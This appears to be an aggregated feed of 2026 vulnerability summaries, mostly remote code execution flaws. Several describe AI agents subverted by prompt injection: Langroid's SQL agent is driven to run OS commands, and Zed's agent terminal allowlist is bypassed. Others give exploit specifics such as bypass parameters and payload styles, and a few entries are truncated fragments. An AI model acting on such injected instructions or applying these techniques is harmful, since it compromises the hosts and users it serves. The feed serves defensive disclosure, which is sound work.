RCE

Local privilege escalation in Ubuntu Linux 6.8 kernel stems from an AppArmor SAUCE patch that omits proper locking when modifying a linked list, enabling a race condition that can be exploited by an unprivileged local user. Successful exploitation leads to a use-after-free condition with theoretical arbitrary code execution in kernel context. No public exploit identified at time of analysis, and the issue is not present on the CISA KEV list.

Remote code execution in vLLM 0.14.1 occurs because `trust_remote_code=True` is hardcoded inside the NemotronVL and KimiK25 model loaders, silently overriding the operator's explicit `--trust-remote-code=False` safety flag. Any deployment that loads a malicious or compromised HuggingFace repository for these model architectures will execute attacker-controlled Python in the inference process, despite UI:R requiring an operator to initiate the model load. No public exploit is identified at time of analysis, but the issue is an incomplete fix for CVE-2025-66448 and CVE-2026-22807, indicating the regression pattern is already well understood.

Arbitrary file write in compliance-trestle's `trestle author jinja` command allows a local user supplying a crafted `-o/--output` argument to write files anywhere the invoking user can write, due to missing validation of `../`, `..\`, and absolute paths. Affected versions are <= 3.12.1 and >= 4.0.0, < 4.0.3, with fixes in 3.12.2 and 4.0.3. No public exploit identified at time of analysis, though the GitHub Security Advisory (GHSA-4q5v-7g7x-j79w) includes a full reproducer; CVSS 8.4 reflects high impact on confidentiality, integrity, and availability.

Remote code execution in GitButler desktop application versions prior to 0.19.7 allows attackers to execute arbitrary scripts within the Tauri webview by injecting malicious links into pull request bodies. The flaw activates when a user with forge integration enabled clicks the crafted link, leading to full compromise of the desktop client context. No public exploit identified at time of analysis, though the GitHub Security Advisory GHSA-xpmj-536r-9fc6 publicly documents the issue.

Arbitrary code execution in the Zed code editor (versions prior to 0.229.0) is possible by abusing its terminal tool permission system, which fails to account for environment-variable prefixes on allowlisted commands. An attacker who can influence what the agent runs (for example via a malicious prompt or repository content) can prepend assignments such as PAGER=/path/to/payload to a permitted command and hijack execution. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

{var@P} prompt-string operator. Zed's terminal tool system enforces command-prefix allowlists to control what commands can be executed; the bypass exploits an incomplete input validation list (CWE-184) to chain expansions that resolve to arbitrary shell commands while appearing to match an approved prefix. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in CISA KEV, though the RCE-tagged nature and CVSS High confidentiality impact make it a meaningful concern for users relying on Zed's agentic terminal tool permissions.

Remote code execution in Zed code editor versions prior to 0.227.1 occurs when a user opens a folder containing a malicious .git/config file that abuses the core.fsmonitor Git configuration option. The flaw triggers even in untrusted mode, defeating the safety boundary users expect when opening unknown repositories, and no public exploit has been identified at time of analysis though the advisory is published by the vendor.

Security restriction bypass in logback-core's HardenedObjectInputStream allows limited object injection via logback's SimpleSocketServer and SimpleSSLSocketServer components, affecting all versions through 1.5.32 inclusive. An attacker who can influence serialized data submitted to these socket server endpoints can instantiate objects from java.lang and java.util classes not explicitly blocked by the hardened deserializer, circumventing its intended allowlist controls. The vendor and NVD both confirm no practical remote code execution or significant privilege escalation has been identified; the real-world impact is limited confidentiality and integrity exposure. No public exploit identified at time of analysis beyond E:P proof-of-concept maturity indicated in the CVSS vector. Not listed in CISA KEV.

An issue in SMSGate sms-core<=2.1.13.6 allows a remote attacker to execute arbitrary code via the Cmpp7FDeliverRequestMessageCodec.java component

Remote code execution in Responsive FileManager 9.14.0 enables authenticated attackers to run arbitrary code on the underlying server by abusing the force_download.php component. The CWE-98 classification points to improper control of PHP file inclusion, and while no public exploit is identified at time of analysis, the high CVSS of 8.0 reflects full confidentiality, integrity, and availability impact once a target user interacts with the attacker-supplied input.

{get,set}_value The uvd/vce/vcn code accesses the IB at predefined offsets without checking that the IB is large enough. Check the bounds here. The caller is responsible for making sure it can handle arbitrary return values. Also make the idx a uint32_t to prevent overflows causing the condition to fail.

Arbitrary file upload leading to remote code execution affects the GutenBee – Gutenberg Blocks WordPress plugin in all versions through 2.20.1, enabling authenticated users with Author role or higher to upload PHP files disguised with double extensions such as shell.json.php. The flaw stems from a permissive strpos() substring check in gutenbee_file_and_ext_json that allows attackers to bypass WordPress filetype validation and execute arbitrary PHP on the server. No public exploit is identified at time of analysis, and the issue is not listed in CISA KEV.

Remote code execution in the Crawlomatic Multipage Scraper Post Generator plugin for WordPress (versions up to and including 2.7.2) allows authenticated users with author-level privileges to execute arbitrary PHP code on the server by abusing the 'callback_raw' or 'callback' shortcode attributes processed by the filter_content function. The flaw stems from passing attacker-controlled input directly to call_user_func() guarded only by is_callable(), which still permits dangerous PHP built-ins like system, shell_exec, exec, passthru, and assert. No public exploit identified at time of analysis, but Wordfence has published a detailed advisory and the shortcode sink is trivially reachable for any author-level account.

Remote code execution in Comet Backup server allows a tenant administrator to inject arbitrary code into the backup agent signing module via insufficient character filtering, ultimately running code with elevated privileges on the Comet server and on connected backup agent devices. The vendor advisory links the issue to the branding configuration path, and no public exploit has been identified at time of analysis. Combined with a Scope:Changed CVSS:3.1 score of 9.0, successful exploitation pivots from a single tenant context into the underlying server and downstream endpoints.

Remote code execution in Veeam Service Provider Console versions 9.0 through 9.2 allows authenticated remote attackers to execute arbitrary code on the server, per the CVSS 4.0 vector requiring low privileges (PR:L) over the network. With a CVSS score of 9.4 and a scope change indicating impact beyond the vulnerable component (SC:H/SI:H/SA:H), successful exploitation could compromise managed downstream customer environments. No public exploit identified at time of analysis, and the CVE is not listed in CISA KEV.

An arbitrary file upload vulnerability in the pages/admin.uploadmapimg.php component of SourceBans Material Admin v1.1.6 allows attackers to execute arbitrary code via uploading a crafted image file.

Arbitrary file write in the compliance-trestle Python library (versions 4.0.0-4.0.2 and any release below 3.12.2) lets an attacker who controls a referenced OSCAL artifact plant attacker-supplied content anywhere the trestle process can write. The HTTPSFetcher and SFTPFetcher cache layer builds the local cache file path directly from the URL path component, so when trestle imports a remote OSCAL profile whose href contains `../` traversal the fetched HTTP/SFTP response body escapes the .trestle cache directory; overwriting files such as /etc/cron.d entries, ~/.ssh/authorized_keys, or a module on sys.path turns the primitive into code execution. A reproducible public proof-of-concept exists in the GHSA advisory (GHSA-g3vg-vx23-3858); the flaw is not listed in CISA KEV and no CVSS or EPSS scoring is provided, but the maintainers have shipped fixes in 4.0.3 and 3.12.2.

Remote code execution in Yamcs (the open-source mission control framework, yamcs-core) before 5.12.7 lets an authenticated operator holding the ChangeMissionDatabase privilege overwrite a Python (Jython) algorithm via the Mission Database REST API and run arbitrary OS commands on the host. The Jython script engine is invoked without a sandbox, so injected algorithm text can import java.lang.Runtime and shell out. Publicly available exploit code exists (a full PoC is published in the GitHub Security Advisory), but the issue is not listed in CISA KEV and no public in-the-wild exploitation is identified.

Remote code execution in the Yamcs mission control framework (org.yamcs:yamcs-core, releases 4.7.3 through 5.12.6) lets a caller of the algorithm-override endpoint run arbitrary Java/OS code on the ground server. The Nashorn JavaScript engine that evaluates user-supplied algorithm text is created without a ClassFilter, so payloads can reach any Java class (e.g. java.lang.Runtime) and execute commands as the Yamcs process user; because the default install (no security.yaml) gives the built-in guest user superuser=true, the endpoint is reachable by an unauthenticated network attacker. A detailed working exploit is published in the GitHub Security Advisory (publicly available exploit code exists); the issue is not listed in CISA KEV and no EPSS score was provided in the input.

Unauthenticated PHP object deserialization affects Symfony's Monolog Bridge through the development-time `server:log` console command, which by default binds a TCP listener to 0.0.0.0:9911 and runs `unserialize(base64_decode())` on every received frame with no class allowlist, authentication, or integrity check. Any host that can reach port 9911 on a machine running `server:log` can submit attacker-controlled serialized payloads, producing at minimum an unauthenticated denial of service (a non-array value triggers a fatal type error) and potentially object injection or full remote code execution where usable gadget chains exist in the target's autoloaded classes. Affected versions are symfony/symfony and symfony/monolog-bridge below 5.4.52, 6.x below 6.4.40, and 7.x below 7.4.12; there is no public exploit identified at time of analysis and no CVSS, EPSS, or CISA KEV data is available.

Unauthorized OS command execution in Tanium Connect allows an attacker holding low-privilege authenticated access to run arbitrary commands on the host, achieving full compromise of confidentiality, integrity, and availability. The CVSS 8.8 (network vector, low complexity, low privileges, no user interaction) reflects an authenticated remote code execution issue rooted in command injection (CWE-78). No public exploit has been identified at time of analysis and the vulnerability is not listed in CISA KEV; EPSS data was not provided.

Pre-NVD disclosure via oss-security: oss-security mailing list - 2026/05/21. he.org>) Linux kernel: Dirty Frag variants — fix merged into netdev (Hyunwoo Kim <imv4bel@...il.com>) Re: Linux kernel: Dirty Frag variants — fix merged into netdev (Solar Designer <solar@...nwall.com>) Re: Linux kernel: Dirty Frag variants — fix merged into netdev (Hyunwoo Kim <imv4bel@...il.com>) CVE-2026-47243: Kata Containers runtime-rs 3.30: virtiofsd symlink escape (Aurelien Bombo <aurelien.bombo@...rosoft.com>) CVE-2026-46473: Authen::TOTP versions before 0.1.1 for Perl generate secrets using rand (Robert Rothenberg <rrwo@...nsec.org>) Re: On the issue of MIME handlers that execute arbitrary code (e.

Remote code execution in Langroid before 0.63.0 arises because its SQLChatAgent executes SQL text generated by an LLM, and that LLM is steerable through prompt injection — including indirect injection via data returned from the database into the model's context. When the agent connects with a database role holding code-execution or filesystem privileges, an attacker who shapes the agent's input can drive emission of dialect-specific primitives like PostgreSQL's COPY ... FROM PROGRAM to run OS commands on the database host. A full working proof-of-concept (Base64-smuggled COPY FROM PROGRAM running 'id') is published in the GitHub advisory; there is no entry in CISA KEV, so this reflects publicly available exploit code rather than confirmed active exploitation.

Unauthenticated remote code execution affects Pi.Alert, an open-source WiFi/LAN intruder detector with web-based service monitoring, in all versions prior to the 2026-05-07 release. The web configuration editor writes attacker-controlled content into pialert.conf, which the background scan daemon subsequently evaluates with Python's exec(), so injected statements run with the daemon's privileges. Because the product ships with web protection disabled by default, an attacker reaching the web interface needs no credentials, yielding a CVSS 9.8 critical flaw; no public exploit identified at time of analysis.

Unauthenticated remote code execution affects Pi.Alert, a Python-based Wi-Fi/LAN intruder detector, in all releases prior to the 2026-05-07 fix. The web UI's SaveConfigFile() endpoint writes attacker-supplied numeric configuration values such as SMTP_PORT into pialert.conf with no validation, and because that file is reloaded via Python's exec() by a background cron job every 3-5 minutes, injected Python executes at the OS level. On default installations (PIALERT_WEB_PROTECTION = False) no credentials are required, matching the CVSS 9.8 network/no-privilege rating; there is no public exploit identified at time of analysis and the CVE is not in CISA KEV, but trivial complexity and full CIA impact make it a high-priority patch.

Remote code execution in RELATE LMS (the inducer/relate web courseware platform) stems from its Celery task queue being configured to accept and unpickle untrusted messages (CELERY_ACCEPT_CONTENT included "pickle"). Because the code-execution sandbox lacks network isolation, an authenticated student can reach the message broker and deliver a malicious pickle payload that the worker deserializes, yielding arbitrary command execution on the host. No public exploit identified at time of analysis; the issue is corrected in commit d66ba5659b459bf1ba56b7109b5f9ecf197cbefb.

Local privilege escalation via command injection in Raynet rvia (RayVentory) 12.6.4392.49-amd64.deb allows authenticated local users to achieve arbitrary code execution by exploiting an improperly terminated find query the application uses to locate the Java runtime. The flaw is reachable through the getconfig command, the upload URL argument, and the oracle -o flag, and publicly available exploit code exists on GitHub although no active exploitation has been observed.

Local arbitrary code execution in Raynet rvia 12.6 Update 8 and earlier lets a low-privileged local user inject operating-system commands through the application's Java search feature, which assembles a `find` command from an attacker-controlled path without properly terminating the search criteria (CWE-77 OS command injection). A working proof-of-concept exploit script is publicly available on GitHub (Wise-Security/CVE-2026-38945), and CISA's SSVC framework rates the technical impact as total, though it marks the issue as not automatable and requiring local access. No EPSS score and no CISA KEV listing were supplied, so there is no public exploit identified as actively exploited at time of analysis.

PHP object injection in Pimcore (packages pimcore/pimcore and admin-ui-classic-bundle) up to and including version 12.3.6 arises from six code paths calling unserialize() without the allowed_classes restriction on values read from database columns and filesystem files. An attacker who can already write to one of those sources - for example through SQL injection into the tmp_store, sites, or custom_layouts tables, or a file write to the WebDAV delete log - can plant a serialized PHP gadget chain that executes arbitrary code with web-server privileges once the data is deserialized. No public exploit identified at time of analysis (the vendor advisory documents only a conceptual PoC procedure), the CVE is not in CISA KEV, and EPSS is not provided; the issue is fixed in 12.3.7 and rated CVSS 8.0, with the High attack-complexity reflecting its dependence on a separate write primitive and a working gadget chain.

Arbitrary file write in the Jenkins Credentials Binding Plugin (version 720.v3f6decef43ea_ and earlier) lets users who can supply file or zip-file credentials to a job write files to attacker-chosen paths on the node filesystem, escalating to remote code execution when Jenkins is configured to let a low-privileged user configure such credentials for a job running on the built-in node. The flaw stems from missing file-name sanitization on the file and zip credential types. Rated CVSS 7.5 with high attack complexity (AC:H); no public exploit identified at time of analysis and the issue is not in CISA KEV.

Remote code execution in Dolibarr ERP/CRM versions 22.0.0 through 22.0.4 and 24.0.0-alpha allows network-based attackers to execute arbitrary PHP code via the commonobject.class.php component. The CVSS 7.3 (AV:N/AC:L/PR:N/UI:N) vector indicates no authentication or user interaction is required, though impact metrics are rated Low across CIA. No public exploit identified at time of analysis, and EPSS scoring is very low at 0.06% (18th percentile) despite the unauthenticated network attack surface.

Remote code execution in Dolibarr ERP/CRM versions 22.0.0 through 22.0.4 and 24.0.0-alpha stems from unsafe use of PHP's call_user_func_array() within the cron job class, enabling attackers to execute arbitrary PHP code on the application server. The vulnerability carries CVSS 7.3 with CWE-94 (Code Injection) classification, and while no public exploit is identified at time of analysis, a security researcher writeup referenced from NVD discusses a five-year history of related dol_eval issues in Dolibarr suggesting recurring weaknesses in this code area. EPSS probability is very low at 0.06% and SSVC reports no observed exploitation, but the issue is rated automatable with partial technical impact.

Code injection in Dolibarr ERP/CRM versions 22.0.0 through 22.0.4 and 24.0.0-alpha allows a remote, unauthenticated attacker to execute attacker-controlled PHP through the htdocs/core/actions_addupdatedelete.inc.php request handler (CWE-94). The CVSS vector (AV:N/AC:L/PR:N/UI:N) indicates a low-effort, network-reachable, no-authentication attack, though all impact metrics are rated Low (C:L/I:L/A:L), suggesting the executable surface is constrained rather than full system takeover. There is no public exploit code confirmed in the provided data and the issue is not in CISA KEV (no observed exploitation per SSVC), but a referenced research write-up and a GitHub Security Advisory exist, and SSVC rates the flaw as automatable.

Arbitrary code execution in IBM Aspera High-Speed Transfer Server and Endpoint (versions 3.7.4 through 4.4.7 Fix Pack 1) arises from a stack-based buffer overflow in the asperahttpd component. An authenticated user with network access can corrupt memory in this HTTP handling component to run code in the context of the service, fully compromising confidentiality, integrity, and availability (CVSS 8.8). No public exploit has been identified at time of analysis, and the CVE is not listed in CISA KEV; EPSS data was not provided.

Remote code execution and authentication bypass are possible in IBM Aspera High-Speed Transfer Server and High-Speed Transfer Endpoint (versions 3.7.4 through 4.4.7 Fix Pack 1) through a heap-based buffer overflow in the asperahttpd component. An unauthenticated network attacker can corrupt memory to crash the service (denial of service) and, in the worst case, hijack execution flow to run arbitrary code or bypass authentication. There is no public exploit identified at time of analysis and SSVC lists exploitation as none, but the CVSS 9.8 rating and 'Automatable: yes' assessment mark this as a high-priority patching target.

Remote code execution in IBM Langflow OSS versions 1.0.0 through 1.9.1 lets unauthenticated network attackers run arbitrary code by abusing how the platform handles symbolic links while unpacking uploaded archives. Because extraction does not properly validate symlink targets, a crafted archive can write files outside the intended directory and ultimately achieve code execution on the host. The flaw carries a critical CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) and is reachable without authentication or user interaction, though no public exploit identified at time of analysis.

Remote code execution in Tasmota firmware (v15.3.0.3 and all earlier releases) stems from an unbounded strcpy() into the fixed 40-byte jpg_task.boundary[40] buffer inside fetch_jpg() in the Scripter driver (xdrv_10_scripter.ino). A network attacker able to reach the device and trigger this code path can overflow the buffer and, per the vendor description, execute arbitrary code on the ESP-based device. Publicly available exploit code exists (a CVE-named GitHub repository), and CISA's SSVC framework rates exploitation as POC with the attack automatable; no active exploitation is confirmed.

Remote code execution in Tasmota firmware version 15.3.0.3 and earlier allows remote unauthenticated attackers to trigger a stack-based buffer overflow in the fetch_jpg() function of the xdrv_10_scripter.ino scripting driver. The flaw is exposed over the network with low complexity and no privileges required (CVSS 7.3 AV:N/AC:L/PR:N/UI:N), and a public proof-of-concept repository has been registered, though no public exploit code was identified in the references at time of analysis. EPSS probability is very low (0.05%, 15th percentile) and the issue is not listed in CISA KEV.

Unauthenticated remote command injection in the Netis AC1200 Router (model NC21, firmware V4.0.1.4296) allows any LAN-resident attacker to execute arbitrary OS commands as the router's runtime user via a single HTTP POST to /cgi-bin/skk_set.cgi. The password and new_pwd_confirm parameters are concatenated into a shell invocation without sanitization, and exploitation requires no credentials. No public exploit is identified at time of analysis, though the disclosure repository documents the technique (base64-encoded backtick payloads), and EPSS scoring (0.21%) suggests limited broad exploitation pressure despite the trivial attack complexity.

OS command injection in MB connect line / Helmholz mbNET and REX industrial remote-maintenance routers (mbNET.mini up to 3.0.2, REX200/250 and mbNET/mbNET.rokey up to 8.4.4, REX100 up to 3.0.2) lets a high-privilege authenticated user poison the device's configuration generator so that a tainted value is later passed unsanitized to a system execute call, producing arbitrary command execution with total loss of confidentiality, integrity and availability. The flaw was reported through CERT@VDE (advisory VDE-2026-054) and tracked as EUVD-2026-32151. There is no public exploit identified at time of analysis, EPSS is low (0.07%, 22nd percentile), and CISA's SSVC framework rates current exploitation as none.

Code execution is possible on MB connect line industrial remote-maintenance routers - mbNET/mbNET.rokey, mbNET.mini, and the REX100/REX200/250 families - when a local attacker supplies a specially crafted configuration file on a USB stick that triggers a type-confusion flaw in the device's cfgparser, yielding total loss of confidentiality, integrity, and availability (CVSS 8.4). The flaw requires local/physical access to the device rather than network reach. There is no public exploit identified at time of analysis, and the EPSS score is very low (0.02%, 7th percentile), consistent with the SSVC assessment of no observed exploitation.

Remote code execution in Synology BeeStation OS versions before 1.3.2-65648 stems from a classic buffer overflow in the AdminCenter component, the device's web-based management interface. The CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:N) indicates a network-reachable flaw exploitable by unauthenticated attackers with low complexity and no user interaction, yielding full compromise of confidentiality, integrity, and availability (9.8 Critical). There is no public exploit identified at time of analysis, and the issue is not listed in CISA KEV, but the unauthenticated network-RCE profile on a consumer NAS device makes this a high-priority patch target.

Remote code execution in the WPCode WordPress plugin (versions through 2.3.5) lets authenticated author-level users run arbitrary PHP on the server. Because the plugin registers its 'wpcode' custom post type without a dedicated capability_type, WordPress falls back to standard post capabilities, so any author can create and publish PHP snippet posts via the XML-RPC wp.newPost method, which are later passed to eval() when rendered through the [wpcode] shortcode. EPSS is modest at 0.44% (63rd percentile) and there is no public exploit identified at time of analysis, but the low privilege bar and full CIA impact make this a high-priority patch for any multi-author site.

Remote code execution in the affiliate-toolkit WordPress plugin ("Multi-Network Affiliate & Amazon Product Display") affects versions up to and including 3.8.5, letting authenticated users with Editor-level access or higher run arbitrary PHP on the host. The flaw stems from the bundled BladeOne template engine's runString() method, which compiles attacker-supplied template content into PHP and executes it through eval() with no sanitization or sandboxing. There is no public exploit identified at time of analysis and EPSS sits at a low 0.24%, but the technical impact is total because a successful injection yields full server-side code execution.

Arbitrary root code execution in Phoenix Contact PLCnext Control devices (all firmware before 2026.0.3) is reachable by an authenticated low-privileged Engineer user who installs APP packages from the PLCnext Store through the Web-based Management (WBM) interface. Because the device never verifies the integrity or signature of the downloaded app (CWE-347, tagged JWT Attack), a tampered package runs as root and can compromise the integrity and availability of the controller. No public exploit is identified at time of analysis and EPSS is low (0.06%, 18th percentile), but the flaw is network-reachable with low attack complexity and a vendor patch (2026.0.3) is available.

Local File Inclusion in the Query Shortcode plugin for WordPress (all versions through 0.2.1) lets authenticated users with contributor-level access or higher coerce the shortcode handler into including and executing arbitrary .php files already present on the server. Because included files are run by the PHP interpreter, this can leak sensitive data, bypass access controls, and escalate to full remote code execution where an attacker can also place a .php file (e.g. via an upload feature). EPSS rates near-term exploitation probability very low (0.07%, 21st percentile) and there is no public exploit identified at time of analysis.

Arbitrary Perl code execution in the IO::Compress distribution (all versions before 2.220) lets an attacker who controls the output glob string passed to the bundled File::GlobMapper run arbitrary Perl at the calling process's privilege. The output glob is wrapped in double quotes and later handed to Perl's eval STRING, so an embedded double quote escapes the string context and the trailing characters execute as code. This is rated CVSS 7.3 and tagged RCE/Code Injection; no public exploit was identified at time of analysis and EPSS is very low (0.03%), but a vendor patch (2.220) and the fixing commit are publicly available.

OS command injection in Tanium Connect lets an authenticated, low-privileged user execute arbitrary commands on the underlying host, yielding full confidentiality, integrity, and availability compromise (CVSS 8.8). The flaw affects Connect branches 5.26, 5.29, and 5.37 below their respective fixed builds and is tagged as RCE/Command Injection. There is no public exploit identified at time of analysis, and EPSS estimates exploitation probability at a low 0.07% (22nd percentile).

Arbitrary code execution in GDAL 3.1.0 through 3.13.0 is reachable through the netCDF driver, where scanForGeometryContainers (frmts/netcdf/netcdfsg.cpp) copies a CF-convention geometry attribute into a fixed-size stack buffer without checking its length. Any service or workflow that feeds attacker-supplied NetCDF files to GDAL can be coerced into overflowing the stack and running attacker code in the process context. No public exploit is identified at time of analysis and EPSS is just 0.01% (3rd percentile), yet the issue carries a CVSS of 7.4 because the outcome is full remote code execution on the host.

Remote code execution in Yamcs (Yet Another Mission Control System) versions before 5.12.7 allows an authenticated user holding the ChangeMissionDatabase privilege to run arbitrary OS commands on the server host. The flaw lives in the JavaExprAlgorithmExecutionFactory, which dynamically compiles user-supplied algorithm text with the Janino compiler without any sandbox or restrictive ClassLoader, so injected Java (e.g. java.lang.Runtime.exec) executes with the privileges of the Yamcs process. A detailed proof-of-concept exploit using a REST PATCH to override an existing algorithm is publicly available in the vendor advisory; the issue is not listed in CISA KEV.

Arbitrary method call in Kirby CMS (versions ≤ 4.9.0 and 5.0.0–5.4.0) lets attackers in the pool of authenticated Panel users invoke unintended PHP model methods by abusing REST API search and collection-query parameters such as filter, sort, not, group, pluck, and findBy. Because Kirby did not validate which model attributes a query could reference, an attacker can reach sensitive methods like password() to leak password hashes, root() to disclose absolute server filesystem paths, loginPasswordless() to escalate into another user's account, or delete() to mass-delete queried models. No CVSS score, EPSS probability, or CISA KEV listing is provided in the source data, and no public exploit is identified at time of analysis, though the vendor rates the real-world impact as high.

Unauthenticated remote code execution in FUXA 1.3.0 (the fuxa-server npm package) lets any network-reachable attacker run arbitrary OS commands on the SCADA/HMI host when secureEnabled is true. The POST /api/runscript endpoint authorizes a request against a stored script's permission, but with test:true it instead compiles and runs attacker-supplied code via Node's Module._compile, so a guest who knows a valid script ID and name (leaked via the unauthenticated GET /api/project endpoint) can execute code with full Node runtime access. Publicly available exploit code exists in the vendor advisory; no CVSS, EPSS, or CISA KEV data is provided.

Pre-authentication remote code execution affects FUXA, an open-source web-based SCADA/HMI platform, in versions >= 1.2.11 and < 1.3.1 (the advisory references build v1.3.0-2706). The flaw is a path-confusion authentication bypass: the login middleware performs a substring match against the full request URL (including the query string), so appending a benign-looking parameter such as ?x=/socket.io to any administrative request causes the server to treat it as a public WebSocket handshake and skip the secureEnabled and nodeRedAuthMode checks entirely. When Node-RED is enabled with command-capable nodes, this reaches the /nodered/* admin interface and yields code execution in the container context (advisory states 'as root'). The GitHub Security Advisory (GHSA-p69w-mmfv-xrfj) discloses the exact bypass payload, so publicly available exploit details exist; there is no CISA KEV listing and no public report of active exploitation at time of analysis.

Linked Data Signature forgery in Fedify (the @fedify/fedify ActivityPub server framework) before 2.2.3 lets remote unauthenticated attackers reshape a third-party-signed activity so it is interpreted differently while its signature still verifies. Because the signature covers the canonical RDF graph rather than the JSON-LD serialization, an attacker who has received a signed activity can use JSON-LD keywords (@graph, @reverse, @included) or context-alias tricks to promote, hide, or rewrite fields and have the forged result accepted as authentic. There is no public exploit identified at time of analysis and the issue is not in CISA KEV, but the GitHub Security Advisory documents the exact restructuring techniques in detail.

Arbitrary package installation leading to code execution affects the yeoman-environment npm library (the runtime behind the Yeoman/`yo` scaffolding CLI) in versions >= 2.9.0 and < 6.0.1. The vulnerable `installLocalGenerators()` method silently calls `repository.install()` on caller-supplied package names without any user confirmation, so a downstream CLI that passes attacker-controlled project configuration into this path will install and execute attacker-chosen packages during bootstrap. There is no public exploit identified at time of analysis and the issue is not on CISA KEV; CVSS is 8.6 (high) but exploitation is contingent on how consumers feed configuration into the library.

Remote code execution in Lumiverse AI chat application prior to 0.9.7 allows any authenticated user to run arbitrary OS-level commands on the server by abusing the MCP server creation endpoint. Although the endpoint allowlists binary names (node, bun, python3, deno), it forwards user-controlled args unfiltered to the child process, and every allowed binary supports inline code execution flags (-e or -c). No public exploit identified at time of analysis, but the CVSS 9.9 rating reflects the trivial exploit path and the fact that the server binds on all interfaces with a bypassable host-header rebinding check.

Remote code execution in FastNetMon Community Edition through 1.2.9 stems from an off-by-one heap write in the pervasively-used dynamic_binary_buffer_t class, reachable by anyone who can send NetFlow, sFlow, IPFIX, or BGP traffic to the DDoS-detection appliance. Because the flawed buffer is exercised during BGP encoding/decoding, NetFlow template parsing, and Flow Spec NLRI construction, an unauthenticated network attacker can corrupt adjacent heap metadata and potentially execute arbitrary code. The flaw carries a critical CVSS 9.8 (AV:N/AC:L/PR:N/UI:N), but no public exploit is identified at time of analysis and it is not listed in CISA KEV.

NitroSense 3.x before 3.01.3052 contains Local Privilege Escalation (LPE) vulnerability.The program exposes a Windows Named Pipe that uses a custom protocol to invoke internal functions. However, this Named Pipe is misconfigured, allowing any authenticated local user to execute arbitrary code with NT AUTHORITY\SYSTEM privileges and to delete arbitrary files with SYSTEM privileges. By leveraging this, an attacker can execute arbitrary code on the target system with elevated privileges.

Command injection in Prefect 3.6.18's GitHub integration allows authenticated users to execute arbitrary git commands through the unsanitized reference field. The GitHubRepository block concatenates user input directly into git clone commands, enabling attackers to inject malicious options that can lead to SSRF, credential theft, or remote code execution. While no active exploitation is confirmed, the straightforward attack vector and high impact make this a priority for organizations using Prefect's GitHub integration features.

Remote code injection in vps-inventory-monitoring allows authenticated attackers to execute arbitrary PHP code through the VpsTest console command. The vulnerability exists in the eval() function within VpsTest.php, exploitable by manipulating the 'vf' parameter with low attack complexity. Publicly available exploit code exists (GitHub POC published), and the maintainer has not responded to early disclosure attempts. CVSS 6.3 reflects moderate impact across confidentiality, integrity, and availability, with EPSS data unavailable but risk elevated by confirmed POC and unresponsive vendor.

Arbitrary code execution in Docker Desktop's Model Runner on macOS allows any container on the Docker network to escape to the host by serving a malicious model whose config.json points model_file at a Python file. The MLX inference backend uses MLX-LM's importlib-based loader with no trust_remote_code gate and no sandbox, so a pull-and-infer request to model-runner.docker.internal executes attacker code as the Docker Desktop user. No public exploit identified at time of analysis and KEV status is not indicated.

Arbitrary code execution in Docker Model Runner's vllm-metal inference backend on macOS allows any container on the Docker network to execute Python code on the host as the Docker Desktop user. The vllm-metal backend hardcodes trust_remote_code=True when loading tokenizers and runs unsandboxed, so any model pulled from an OCI registry can ship attacker-controlled Python that executes when inference is requested via the model-runner.docker.internal API. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

An issue was discovered in all versions of PCManFM-Qt starting from 1.1.0. When a regular file's path is passed as a URI in an org.freedesktop.FileManager1.ShowFolders D-Bus method call, PCManFM-Qt delegates to a different program (based on the file type) without user confirmation. This could be used to achieve code execution or circumvent network namespace restrictions. NOTE: those outcomes are potentially unwanted by most users; however, the behavior of the product does comply with the applicable specification, and a simplistic solution (ensuring that the URI does not name a regular file) may have adverse consequences for I/O.

Arbitrary code execution in Amazon Braket Python SDK versions prior to 1.117.0 allows an authenticated attacker with S3 write access to the job output bucket to compromise any client machine that processes those job results. The flaw stems from insecure pickle deserialization in the job results processing component, and while no public exploit has been identified at time of analysis, the impact extends to every downstream consumer of poisoned results. EPSS data is unavailable, but the supply-chain-style propagation across analyst workstations and CI systems materially raises real-world risk.

Remote code execution in Ivanti Secure Access Client versions prior to 22.8R6 allows unauthenticated attackers to run arbitrary code on endpoints by exploiting improper TLS certificate validation, contingent on user interaction (UI:R). No public exploit identified at time of analysis, but the CVSS 8.8 rating and Ivanti's own advisory disclosure mark this as a high-priority client-side risk for organizations using the VPN client.

The fix for CVE-2025-48913: Apache CXF: Untrusted JMS configuration can lead to RCE was not complete, meaning that another path in the code might lead to code execution capabilities, if untrusted users are allowed to configure JMS for Apache CXF. Users are recommended to upgrade to versions 4.2.1, 4.1.6 or 3.6.11, which fix this issue.

A cross-site scripting (XSS) vulnerability in SketchUp 2026's Dynamic Components feature allows remote code execution and local file exfiltration through maliciously crafted SKP files. The vulnerability stems from improper input sanitization in the component options window, enabling attackers to execute arbitrary system commands and read local files without user interaction by exploiting an embedded Internet Explorer 11 browser.

Buffer Overflow vulnerability in Easy Chat Server 3.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via the chat message functionality

An issue in ClipBucket v5 v.5.5.2 allows an attacker to execute arbitrary code via the Authentication interface, login page endpoint and HTTP response security headers components

Directory Traversal vulnerability in Easy Chat Server 3.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via the UserName parameter

Unauthenticated cross-origin MCP tool invocation in Network-AI v5.4.4 allows a remote attacker to lure a victim to a malicious web page that silently invokes any of the 22 exposed MCP tools (including config_set, agent_spawn, blackboard_write, and token_create/revoke) against the victim's locally running MCP SSE server. The vulnerability stems from an empty default secret combined with a wildcard CORS policy, and publicly available exploit code exists in the GHSA advisory demonstrating end-to-end exploitation. No CISA KEV listing yet and EPSS data was not provided, but the published PoC and trivial attack mechanics make this a meaningful risk for any user running the default Docker deployment.

Arbitrary file write on the host in Boxlite sandbox service versions prior to 0.9.0 allows attackers to escape the OCI image extraction root via crafted symlink entries in layer tarballs, enabling remote code execution on the host (typically as root). Exploitation requires a user to pull and load a malicious OCI image distributed through registries such as DockerHub. Publicly available exploit code exists (vendor-published PoC); no public exploit identified in CISA KEV at time of analysis.

